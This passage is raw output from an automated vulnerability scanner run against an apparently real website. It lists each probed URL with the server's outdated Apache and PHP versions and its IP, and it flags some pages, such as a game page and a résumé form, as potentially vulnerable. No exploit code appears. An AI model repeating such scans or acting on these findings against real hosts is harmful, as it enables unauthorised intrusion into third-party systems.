  2526. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=232 ]
  2527. |_[ + ] Exploit:: 
  2528. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2529. |_[ + ] More details::  / - / , ISP: 
  2530. |_[ + ] Found:: UNIDENTIFIED
  2531. 
  2532.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2533. |_[ + ] [ 9 / 100 ]-[22:15:24] [ - ] 
  2534. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=99 ]
  2535. |_[ + ] Exploit:: 
  2536. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2537. |_[ + ] More details::  / - / , ISP: 
  2538. |_[ + ] Found:: UNIDENTIFIED
  2539. 
  2540.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2541. |_[ + ] [ 10 / 100 ]-[22:15:25] [ - ] 
  2542. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=335 ]
  2543. |_[ + ] Exploit:: 
  2544. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2545. |_[ + ] More details::  / - / , ISP: 
  2546. |_[ + ] Found:: UNIDENTIFIED
  2547. 
  2548.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2549. |_[ + ] [ 11 / 100 ]-[22:15:25] [ - ] 
  2550. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=145 ]
  2551. |_[ + ] Exploit:: 
  2552. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2553. |_[ + ] More details::  / - / , ISP: 
  2554. |_[ + ] Found:: UNIDENTIFIED
  2555. 
  2556.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2557. |_[ + ] [ 12 / 100 ]-[22:15:26] [ - ] 
  2558. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=105 ]
  2559. |_[ + ] Exploit:: 
  2560. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2561. |_[ + ] More details::  / - / , ISP: 
  2562. |_[ + ] Found:: UNIDENTIFIED
  2563. 
  2564.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2565. |_[ + ] [ 13 / 100 ]-[22:15:26] [ - ] 
  2566. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=96 ]
  2567. |_[ + ] Exploit:: 
  2568. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2569. |_[ + ] More details::  / - / , ISP: 
  2570. |_[ + ] Found:: UNIDENTIFIED
  2571. 
  2572.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2573. |_[ + ] [ 14 / 100 ]-[22:15:27] [ - ] 
  2574. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=103 ]
  2575. |_[ + ] Exploit:: 
  2576. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2577. |_[ + ] More details::  / - / , ISP: 
  2578. |_[ + ] Found:: UNIDENTIFIED
  2579. 
  2580.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2581. |_[ + ] [ 15 / 100 ]-[22:15:28] [ - ] 
  2582. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=8899 ]
  2583. |_[ + ] Exploit:: 
  2584. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2585. |_[ + ] More details::  / - / , ISP: 
  2586. |_[ + ] Found:: UNIDENTIFIED
  2587. 
  2588.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2589. |_[ + ] [ 16 / 100 ]-[22:15:28] [ - ] 
  2590. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=118 ]
  2591. |_[ + ] Exploit:: 
  2592. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2593. |_[ + ] More details::  / - / , ISP: 
  2594. |_[ + ] Found:: UNIDENTIFIED
  2595. 
  2596.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2597. |_[ + ] [ 17 / 100 ]-[22:15:31] [ ! ] 
  2598. |_[ + ] Target:: [ ( POTENTIALLY VULNERABLE )  http://www.hapetek.co.il/games/Snake/index.php ]
  2599. |_[ + ] Exploit:: 
  2600. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2601. |_[ + ] More details::  / - / , ISP: 
  2602. |_[ + ] Found::  INDEFINITE-02 - VALUE: Fatal error
  2603. |_[ + ] VALUE SAVED IN THE FILE:: inurlbr-hapetek.co.il.txt
  2604. 
  2605.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2606. |_[ + ] [ 18 / 100 ]-[22:15:32] [ - ] 
  2607. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=334 ]
  2608. |_[ + ] Exploit:: 
  2609. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2610. |_[ + ] More details::  / - / , ISP: 
  2611. |_[ + ] Found:: UNIDENTIFIED
  2612. 
  2613.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2614. |_[ + ] [ 19 / 100 ]-[22:15:32] [ - ] 
  2615. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=100 ]
  2616. |_[ + ] Exploit:: 
  2617. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2618. |_[ + ] More details::  / - / , ISP: 
  2619. |_[ + ] Found:: UNIDENTIFIED
  2620. 
  2621.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2622. |_[ + ] [ 20 / 100 ]-[22:15:33] [ - ] 
  2623. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=106 ]
  2624. |_[ + ] Exploit:: 
  2625. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2626. |_[ + ] More details::  / - / , ISP: 
  2627. |_[ + ] Found:: UNIDENTIFIED
  2628. 
  2629.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2630. |_[ + ] [ 21 / 100 ]-[22:15:34] [ - ] 
  2631. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=8834 ]
  2632. |_[ + ] Exploit:: 
  2633. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2634. |_[ + ] More details::  / - / , ISP: 
  2635. |_[ + ] Found:: UNIDENTIFIED
  2636. 
  2637.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2638. |_[ + ] [ 22 / 100 ]-[22:15:34] [ - ] 
  2639. |_[ + ] Target:: [ http://www.hapetek.co.il/sudoku/read-more.php ]
  2640. |_[ + ] Exploit:: 
  2641. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2642. |_[ + ] More details::  / - / , ISP: 
  2643. |_[ + ] Found:: UNIDENTIFIED
  2644. 
  2645.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2646. |_[ + ] [ 23 / 100 ]-[22:15:40] [ - ] 
  2647. |_[ + ] Target:: [ http://www.hapetek.co.il/poker.pdf ]
  2648. |_[ + ] Exploit:: 
  2649. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.14 (Ubuntu) , IP:212.143.6.110:80 
  2650. |_[ + ] More details::  / - / , ISP: 
  2651. |_[ + ] Found:: UNIDENTIFIED
  2652. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 70162 out of 78692 bytes received
  2653. 
  2654.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2655. |_[ + ] [ 24 / 100 ]-[22:15:41] [ - ] 
  2656. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=8921 ]
  2657. |_[ + ] Exploit:: 
  2658. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2659. |_[ + ] More details::  / - / , ISP: 
  2660. |_[ + ] Found:: UNIDENTIFIED
  2661. 
  2662.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2663. |_[ + ] [ 25 / 100 ]-[22:15:49] [ - ] 
  2664. |_[ + ] Target:: [ http://www.hapetek.co.il/files/214097/214097-Summary.pdf ]
  2665. |_[ + ] Exploit:: 
  2666. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.14 (Ubuntu) , IP:212.143.6.110:80 
  2667. |_[ + ] More details::  / - / , ISP: 
  2668. |_[ + ] Found:: UNIDENTIFIED
  2669. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 70161 out of 638951 bytes received
  2670. 
  2671.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2672. |_[ + ] [ 26 / 100 ]-[22:15:56] [ - ] 
  2673. |_[ + ] Target:: [ http://www.hapetek.co.il/files/324602/324602-Summary.pdf ]
  2674. |_[ + ] Exploit:: 
  2675. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.14 (Ubuntu) , IP:212.143.6.110:80 
  2676. |_[ + ] More details::  / - / , ISP: 
  2677. |_[ + ] Found:: UNIDENTIFIED
  2678. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 71513 out of 1647142 bytes received
  2679. 
  2680.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2681. |_[ + ] [ 27 / 100 ]-[22:15:57] [ - ] 
  2682. |_[ + ] Target:: [ http://www.hapetek.co.il/sg/about/ ]
  2683. |_[ + ] Exploit:: 
  2684. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2685. |_[ + ] More details::  / - / , ISP: 
  2686. |_[ + ] Found:: UNIDENTIFIED
  2687. 
  2688.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2689. |_[ + ] [ 28 / 100 ]-[22:15:58] [ - ] 
  2690. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=8925 ]
  2691. |_[ + ] Exploit:: 
  2692. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2693. |_[ + ] More details::  / - / , ISP: 
  2694. |_[ + ] Found:: UNIDENTIFIED
  2695. 
  2696.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2697. |_[ + ] [ 29 / 100 ]-[22:15:59] [ - ] 
  2698. |_[ + ] Target:: [ http://www.hapetek.co.il/sg/workshops/ ]
  2699. |_[ + ] Exploit:: 
  2700. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2701. |_[ + ] More details::  / - / , ISP: 
  2702. |_[ + ] Found:: UNIDENTIFIED
  2703. 
  2704.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2705. |_[ + ] [ 30 / 100 ]-[22:15:59] [ - ] 
  2706. |_[ + ] Target:: [ http://www.hapetek.co.il/sg/articles/ ]
  2707. |_[ + ] Exploit:: 
  2708. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2709. |_[ + ] More details::  / - / , ISP: 
  2710. |_[ + ] Found:: UNIDENTIFIED
  2711. 
  2712.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2713. |_[ + ] [ 31 / 100 ]-[22:16:02] [ ! ] 
  2714. |_[ + ] Target:: [ ( POTENTIALLY VULNERABLE )  http://www.hapetek.co.il/games/Snake/index.php/snake.swf ]
  2715. |_[ + ] Exploit:: 
  2716. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2717. |_[ + ] More details::  / - / , ISP: 
  2718. |_[ + ] Found::  INDEFINITE-02 - VALUE: Fatal error
  2719. |_[ + ] VALUE SAVED IN THE FILE:: inurlbr-hapetek.co.il.txt
  2720. 
  2721.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2722. |_[ + ] [ 32 / 100 ]-[22:16:03] [ - ] 
  2723. |_[ + ] Target:: [ http://www.hapetek.co.il/sg/gallery/ ]
  2724. |_[ + ] Exploit:: 
  2725. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2726. |_[ + ] More details::  / - / , ISP: 
  2727. |_[ + ] Found:: UNIDENTIFIED
  2728. 
  2729.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2730. |_[ + ] [ 33 / 100 ]-[22:16:06] [ - ] 
  2731. |_[ + ] Target:: [ http://www.hapetek.co.il/?author=1 ]
  2732. |_[ + ] Exploit:: 
  2733. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2734. |_[ + ] More details::  / - / , ISP: 
  2735. |_[ + ] Found:: UNIDENTIFIED
  2736. 
  2737.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2738. |_[ + ] [ 34 / 100 ]-[22:16:10] [ - ] 
  2739. |_[ + ] Target:: [ http://www.hapetek.co.il/?page_id=41 ]
  2740. |_[ + ] Exploit:: 
  2741. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2742. |_[ + ] More details::  / - / , ISP: 
  2743. |_[ + ] Found:: UNIDENTIFIED
  2744. 
  2745.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2746. |_[ + ] [ 35 / 100 ]-[22:16:12] [ - ] 
  2747. |_[ + ] Target:: [ http://www.hapetek.co.il/?page_id=48 ]
  2748. |_[ + ] Exploit:: 
  2749. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2750. |_[ + ] More details::  / - / , ISP: 
  2751. |_[ + ] Found:: UNIDENTIFIED
  2752. 
  2753.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2754. |_[ + ] [ 36 / 100 ]-[22:16:17] [ - ] 
  2755. |_[ + ] Target:: [ http://www.hapetek.co.il/?page_id=62 ]
  2756. |_[ + ] Exploit:: 
  2757. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2758. |_[ + ] More details::  / - / , ISP: 
  2759. |_[ + ] Found:: UNIDENTIFIED
  2760. 
  2761.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2762. |_[ + ] [ 37 / 100 ]-[22:16:24] [ - ] 
  2763. |_[ + ] Target:: [ http://www.hapetek.co.il/?page_id=7 ]
  2764. |_[ + ] Exploit:: 
  2765. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2766. |_[ + ] More details::  / - / , ISP: 
  2767. |_[ + ] Found:: UNIDENTIFIED
  2768. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 60627 bytes received
  2769. 
  2770.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2771. |_[ + ] [ 38 / 100 ]-[22:16:29] [ - ] 
  2772. |_[ + ] Target:: [ http://www.hapetek.co.il/?page_id=27 ]
  2773. |_[ + ] Exploit:: 
  2774. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2775. |_[ + ] More details::  / - / , ISP: 
  2776. |_[ + ] Found:: UNIDENTIFIED
  2777. 
  2778.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2779. |_[ + ] [ 39 / 100 ]-[22:16:32] [ - ] 
  2780. |_[ + ] Target:: [ http://www.hapetek.co.il/?cat=1 ]
  2781. |_[ + ] Exploit:: 
  2782. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2783. |_[ + ] More details::  / - / , ISP: 
  2784. |_[ + ] Found:: UNIDENTIFIED
  2785. 
  2786.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2787. |_[ + ] [ 40 / 100 ]-[22:16:35] [ ! ] 
  2788. |_[ + ] Target:: [ ( POTENTIALLY VULNERABLE )  http://www.hapetek.co.il/career/resume.php ]
  2789. |_[ + ] Exploit:: 
  2790. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2791. |_[ + ] More details::  / - / , ISP: 
  2792. |_[ + ] Found::  INDEFINITE-02 - VALUE: Fatal error
  2793. |_[ + ] VALUE SAVED IN THE FILE:: inurlbr-hapetek.co.il.txt
  2794. 
  2795.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2796. |_[ + ] [ 41 / 100 ]-[22:16:42] [ - ] 
  2797. |_[ + ] Target:: [ http://www.hapetek.co.il/?page_id=13 ]
  2798. |_[ + ] Exploit:: 
  2799. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2800. |_[ + ] More details::  / - / , ISP: 
  2801. |_[ + ] Found:: UNIDENTIFIED
  2802. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 52503 bytes received
  2803. 
  2804.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2805. |_[ + ] [ 42 / 100 ]-[22:16:44] [ - ] 
  2806. |_[ + ] Target:: [ http://www.hapetek.co.il/?page_id=114 ]
  2807. |_[ + ] Exploit:: 
  2808. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2809. |_[ + ] More details::  / - / , ISP: 
  2810. |_[ + ] Found:: UNIDENTIFIED
  2811. 
  2812.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2813. |_[ + ] [ 43 / 100 ]-[22:16:46] [ - ] 
  2814. |_[ + ] Target:: [ http://www.hapetek.co.il/?p=51 ]
  2815. |_[ + ] Exploit:: 
  2816. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2817. |_[ + ] More details::  / - / , ISP: 
  2818. |_[ + ] Found:: UNIDENTIFIED
  2819. 
  2820.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2821. |_[ + ] [ 44 / 100 ]-[22:16:49] [ - ] 
  2822. |_[ + ] Target:: [ http://www.hapetek.co.il/?p=60 ]
  2823. |_[ + ] Exploit:: 
  2824. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2825. |_[ + ] More details::  / - / , ISP: 
  2826. |_[ + ] Found:: UNIDENTIFIED
  2827. 
  2828.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2829. |_[ + ] [ 45 / 100 ]-[22:16:51] [ - ] 
  2830. |_[ + ] Target:: [ http://www.hapetek.co.il/?p=93 ]
  2831. |_[ + ] Exploit:: 
  2832. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2833. |_[ + ] More details::  / - / , ISP: 
  2834. |_[ + ] Found:: UNIDENTIFIED
  2835. 
  2836.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2837. |_[ + ] [ 46 / 100 ]-[22:16:53] [ - ] 
  2838. |_[ + ] Target:: [ http://www.hapetek.co.il/?m=201402 ]
  2839. |_[ + ] Exploit:: 
  2840. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2841. |_[ + ] More details::  / - / , ISP: 
  2842. |_[ + ] Found:: UNIDENTIFIED
  2843. 
  2844.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2845. |_[ + ] [ 47 / 100 ]-[22:16:56] [ - ] 
  2846. |_[ + ] Target:: [ http://www.hapetek.co.il/?p=69 ]
  2847. |_[ + ] Exploit:: 
  2848. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2849. |_[ + ] More details::  / - / , ISP: 
  2850. |_[ + ] Found:: UNIDENTIFIED
  2851. 
  2852.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2853. |_[ + ] [ 48 / 100 ]-[22:16:58] [ - ] 
  2854. |_[ + ] Target:: [ http://www.hapetek.co.il/?p=86 ]
  2855. |_[ + ] Exploit:: 
  2856. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2857. |_[ + ] More details::  / - / , ISP: 
  2858. |_[ + ] Found:: UNIDENTIFIED
  2859. 
  2860.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2861. |_[ + ] [ 49 / 100 ]-[22:17:00] [ - ] 
  2862. |_[ + ] Target:: [ http://www.hapetek.co.il/?p=92 ]
  2863. |_[ + ] Exploit:: 
  2864. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2865. |_[ + ] More details::  / - / , ISP: 
  2866. |_[ + ] Found:: UNIDENTIFIED
  2867. 
  2868.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2869. |_[ + ] [ 50 / 100 ]-[22:17:02] [ - ] 
  2870. |_[ + ] Target:: [ http://www.hapetek.co.il/?p=20 ]
  2871. |_[ + ] Exploit:: 
  2872. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2873. |_[ + ] More details::  / - / , ISP: 
  2874. |_[ + ] Found:: UNIDENTIFIED
  2875. 
  2876.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2877. |_[ + ] [ 51 / 100 ]-[22:17:05] [ - ] 
  2878. |_[ + ] Target:: [ http://www.hapetek.co.il/?p=5 ]
  2879. |_[ + ] Exploit:: 
  2880. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2881. |_[ + ] More details::  / - / , ISP: 
  2882. |_[ + ] Found:: UNIDENTIFIED
  2883. 
  2884.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2885. |_[ + ] [ 52 / 100 ]-[22:17:07] [ - ] 
  2886. |_[ + ] Target:: [ http://www.hapetek.co.il/?p=89 ]
  2887. |_[ + ] Exploit:: 
  2888. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2889. |_[ + ] More details::  / - / , ISP: 
  2890. |_[ + ] Found:: UNIDENTIFIED
  2891. 
  2892.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2893. |_[ + ] [ 53 / 100 ]-[22:17:09] [ - ] 
  2894. |_[ + ] Target:: [ http://www.hapetek.co.il/?m=201101 ]
  2895. |_[ + ] Exploit:: 
  2896. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2897. |_[ + ] More details::  / - / , ISP: 
  2898. |_[ + ] Found:: UNIDENTIFIED
  2899. 
  2900.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2901. |_[ + ] [ 54 / 100 ]-[22:17:11] [ - ] 
  2902. |_[ + ] Target:: [ http://www.hapetek.co.il/?m=201211 ]
  2903. |_[ + ] Exploit:: 
  2904. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2905. |_[ + ] More details::  / - / , ISP: 
  2906. |_[ + ] Found:: UNIDENTIFIED
  2907. 
  2908.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2909. |_[ + ] [ 55 / 100 ]-[22:17:13] [ - ] 
  2910. |_[ + ] Target:: [ http://www.hapetek.co.il/?p=58 ]
  2911. |_[ + ] Exploit:: 
  2912. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2913. |_[ + ] More details::  / - / , ISP: 
  2914. |_[ + ] Found:: UNIDENTIFIED
  2915. 
  2916.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2917. |_[ + ] [ 56 / 100 ]-[22:17:15] [ - ] 
  2918. |_[ + ] Target:: [ http://www.hapetek.co.il/?m=201403 ]
  2919. |_[ + ] Exploit:: 
  2920. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2921. |_[ + ] More details::  / - / , ISP: 
  2922. |_[ + ] Found:: UNIDENTIFIED
  2923. 
  2924.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2925. |_[ + ] [ 57 / 100 ]-[22:17:17] [ - ] 
  2926. |_[ + ] Target:: [ http://www.hapetek.co.il/?m=201210 ]
  2927. |_[ + ] Exploit:: 
  2928. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2929. |_[ + ] More details::  / - / , ISP: 
  2930. |_[ + ] Found:: UNIDENTIFIED
  2931. 
  2932.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2933. |_[ + ] [ 58 / 100 ]-[22:17:19] [ - ] 
  2934. |_[ + ] Target:: [ http://www.hapetek.co.il/?m=201107 ]
  2935. |_[ + ] Exploit:: 
  2936. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2937. |_[ + ] More details::  / - / , ISP: 
  2938. |_[ + ] Found:: UNIDENTIFIED
  2939. 
  2940.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2941. |_[ + ] [ 59 / 100 ]-[22:17:21] [ - ] 
  2942. |_[ + ] Target:: [ http://www.hapetek.co.il/?m=201303 ]
  2943. |_[ + ] Exploit:: 
  2944. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2945. |_[ + ] More details::  / - / , ISP: 
  2946. |_[ + ] Found:: UNIDENTIFIED
  2947. 
  2948.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2949. |_[ + ] [ 60 / 100 ]-[22:17:22] [ - ] 
  2950. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=404 ]
  2951. |_[ + ] Exploit:: 
